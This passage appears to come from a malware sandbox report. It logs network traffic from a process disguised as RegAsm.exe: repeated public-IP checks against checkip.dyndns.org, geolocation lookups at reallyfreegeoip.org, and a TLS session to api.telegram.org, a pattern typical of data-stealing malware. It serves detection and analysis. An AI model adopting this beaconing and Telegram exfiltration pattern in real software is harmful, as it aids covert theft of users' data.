                                                                                        Dec 13, 2024 17:47:51.293857098 CET4972480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:51.415986061 CET8049722132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:51.416230917 CET4972280192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:51.416379929 CET8049724132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:51.416460037 CET4972480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:51.416651964 CET4972480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:51.537676096 CET8049724132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:52.837898016 CET8049724132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:52.839610100 CET49725443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:52.839665890 CET44349725104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:52.839785099 CET49725443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:52.840054989 CET49725443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:52.840069056 CET44349725104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:52.892339945 CET4972480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:54.090388060 CET44349725104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:54.094508886 CET49725443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:54.094536066 CET44349725104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:54.538934946 CET44349725104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:54.539009094 CET44349725104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:54.539093971 CET49725443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:54.539565086 CET49725443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:54.542335033 CET4972480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:54.543332100 CET4972680192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:54.663305998 CET8049724132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:54.663376093 CET4972480192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:54.663588047 CET8049726132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:54.663680077 CET4972680192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:54.663825035 CET4972680192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:54.783483982 CET8049726132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:56.104537964 CET8049726132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:56.106992960 CET49727443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:56.107040882 CET44349727104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:56.107099056 CET49727443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:56.107362986 CET49727443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:56.107377052 CET44349727104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:56.158015966 CET4972680192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:57.322609901 CET44349727104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:57.324115992 CET49727443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:57.324141026 CET44349727104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:57.776118040 CET44349727104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:57.776185989 CET44349727104.21.67.152192.168.2.8
                                                                                        Dec 13, 2024 17:47:57.776263952 CET49727443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:57.776848078 CET49727443192.168.2.8104.21.67.152
                                                                                        Dec 13, 2024 17:47:57.792398930 CET4972680192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:57.912642956 CET8049726132.226.8.169192.168.2.8
                                                                                        Dec 13, 2024 17:47:57.912734985 CET4972680192.168.2.8132.226.8.169
                                                                                        Dec 13, 2024 17:47:57.932050943 CET49728443192.168.2.8149.154.167.220
                                                                                        Dec 13, 2024 17:47:57.932120085 CET44349728149.154.167.220192.168.2.8
                                                                                        Dec 13, 2024 17:47:57.932241917 CET49728443192.168.2.8149.154.167.220
                                                                                        Dec 13, 2024 17:47:57.932694912 CET49728443192.168.2.8149.154.167.220
                                                                                        Dec 13, 2024 17:47:57.932710886 CET44349728149.154.167.220192.168.2.8
                                                                                        Dec 13, 2024 17:47:59.310399055 CET44349728149.154.167.220192.168.2.8
                                                                                        Dec 13, 2024 17:47:59.310604095 CET49728443192.168.2.8149.154.167.220
                                                                                        Dec 13, 2024 17:47:59.312789917 CET49728443192.168.2.8149.154.167.220
                                                                                        Dec 13, 2024 17:47:59.312799931 CET44349728149.154.167.220192.168.2.8
                                                                                        Dec 13, 2024 17:47:59.313051939 CET44349728149.154.167.220192.168.2.8
                                                                                        Dec 13, 2024 17:47:59.314724922 CET49728443192.168.2.8149.154.167.220
                                                                                        Dec 13, 2024 17:47:59.355338097 CET44349728149.154.167.220192.168.2.8
                                                                                        Dec 13, 2024 17:47:59.817987919 CET44349728149.154.167.220192.168.2.8
                                                                                        Dec 13, 2024 17:47:59.818074942 CET44349728149.154.167.220192.168.2.8
                                                                                        Dec 13, 2024 17:47:59.818419933 CET49728443192.168.2.8149.154.167.220
                                                                                        Dec 13, 2024 17:47:59.822000980 CET49728443192.168.2.8149.154.167.220
                                                                                        Dec 13, 2024 17:48:14.324129105 CET4971180192.168.2.8132.226.8.169
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 13, 2024 17:47:28.061733961 CET6497953192.168.2.81.1.1.1
                                                                                        Dec 13, 2024 17:47:28.200185061 CET53649791.1.1.1192.168.2.8
                                                                                        Dec 13, 2024 17:47:30.548043966 CET6396753192.168.2.81.1.1.1
                                                                                        Dec 13, 2024 17:47:30.995378017 CET53639671.1.1.1192.168.2.8
                                                                                        Dec 13, 2024 17:47:57.793018103 CET5689253192.168.2.81.1.1.1
                                                                                        Dec 13, 2024 17:47:57.931195974 CET53568921.1.1.1192.168.2.8
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 13, 2024 17:47:28.061733961 CET192.168.2.81.1.1.10xfd59Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                        Dec 13, 2024 17:47:30.548043966 CET192.168.2.81.1.1.10xca98Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                        Dec 13, 2024 17:47:57.793018103 CET192.168.2.81.1.1.10x9f6aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 13, 2024 17:47:28.200185061 CET1.1.1.1192.168.2.80xfd59No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 13, 2024 17:47:28.200185061 CET1.1.1.1192.168.2.80xfd59No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                        Dec 13, 2024 17:47:28.200185061 CET1.1.1.1192.168.2.80xfd59No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                        Dec 13, 2024 17:47:28.200185061 CET1.1.1.1192.168.2.80xfd59No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                        Dec 13, 2024 17:47:28.200185061 CET1.1.1.1192.168.2.80xfd59No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                        Dec 13, 2024 17:47:28.200185061 CET1.1.1.1192.168.2.80xfd59No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                        Dec 13, 2024 17:47:30.995378017 CET1.1.1.1192.168.2.80xca98No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                        Dec 13, 2024 17:47:30.995378017 CET1.1.1.1192.168.2.80xca98No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                        Dec 13, 2024 17:47:57.931195974 CET1.1.1.1192.168.2.80x9f6aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                        • reallyfreegeoip.org
                                                                                        • api.telegram.org
                                                                                        • checkip.dyndns.org
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.849704132.226.8.169803344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 13, 2024 17:47:28.336915016 CET151OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Connection: Keep-Alive
                                                                                        Dec 13, 2024 17:47:29.932717085 CET273INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:29 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                        Dec 13, 2024 17:47:29.941494942 CET127OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Dec 13, 2024 17:47:30.448084116 CET273INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:30 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                        Dec 13, 2024 17:47:32.715142965 CET127OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Dec 13, 2024 17:47:33.210464954 CET273INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:32 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.849711132.226.8.169803344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 13, 2024 17:47:35.036549091 CET127OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Dec 13, 2024 17:47:36.468311071 CET273INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:36 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.849715132.226.8.169803344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 13, 2024 17:47:38.283648968 CET151OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Connection: Keep-Alive
                                                                                        Dec 13, 2024 17:47:39.726651907 CET273INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.849718132.226.8.169803344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 13, 2024 17:47:41.583791018 CET151OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Connection: Keep-Alive
                                                                                        Dec 13, 2024 17:47:43.017601013 CET273INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.849720132.226.8.169803344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 13, 2024 17:47:44.943222046 CET151OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Connection: Keep-Alive
                                                                                        Dec 13, 2024 17:47:46.364022970 CET273INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.849722132.226.8.169803344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 13, 2024 17:47:48.164143085 CET151OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Connection: Keep-Alive
                                                                                        Dec 13, 2024 17:47:49.614218950 CET273INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:49 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.849724132.226.8.169803344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 13, 2024 17:47:51.416651964 CET151OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Connection: Keep-Alive
                                                                                        Dec 13, 2024 17:47:52.837898016 CET273INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:52 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.849726132.226.8.169803344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 13, 2024 17:47:54.663825035 CET151OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Connection: Keep-Alive
                                                                                        Dec 13, 2024 17:47:56.104537964 CET273INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:55 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.849706104.21.67.1524433344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-13 16:47:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-13 16:47:32 UTC875INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:32 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 97221
                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2ULT0sMMQi0zJ7a6z66AU%2FCkaaoKUTXojjQjOjFEagr879LSQhSjzKCXPEv8qfBCzNEP0%2F759tDRM9FfSTi69MxJxj67wgbHkCDs7DaoOqLAF0zKYfABNU%2FXG0RmPSEhVHyKgJj"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f176fc44e656a5f-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2001&rtt_var=786&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1362575&cwnd=187&unsent_bytes=0&cid=f007827c6790f923&ts=471&x=0"
                                                                                        2024-12-13 16:47:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.849709104.21.67.1524433344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-13 16:47:34 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        2024-12-13 16:47:34 UTC873INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:34 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 97223
                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O6s7CzSYvPsz78SLgsJ5Lhjal%2FqwQNHnEr7YzqBYcxIUu1WspqIYlL1Q13mmWO65WG65cU4NFE9ocS%2F4npVclNKciJQTMmvzhGFZglrvzhSsjCjarTV6m4Mk6wzQRO0UKiFmGXFv"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f176fd22fd642c0-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1564&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1718658&cwnd=208&unsent_bytes=0&cid=40adbbd267f85547&ts=459&x=0"
                                                                                        2024-12-13 16:47:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.849713104.21.67.1524433344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-13 16:47:37 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        2024-12-13 16:47:38 UTC877INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:37 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
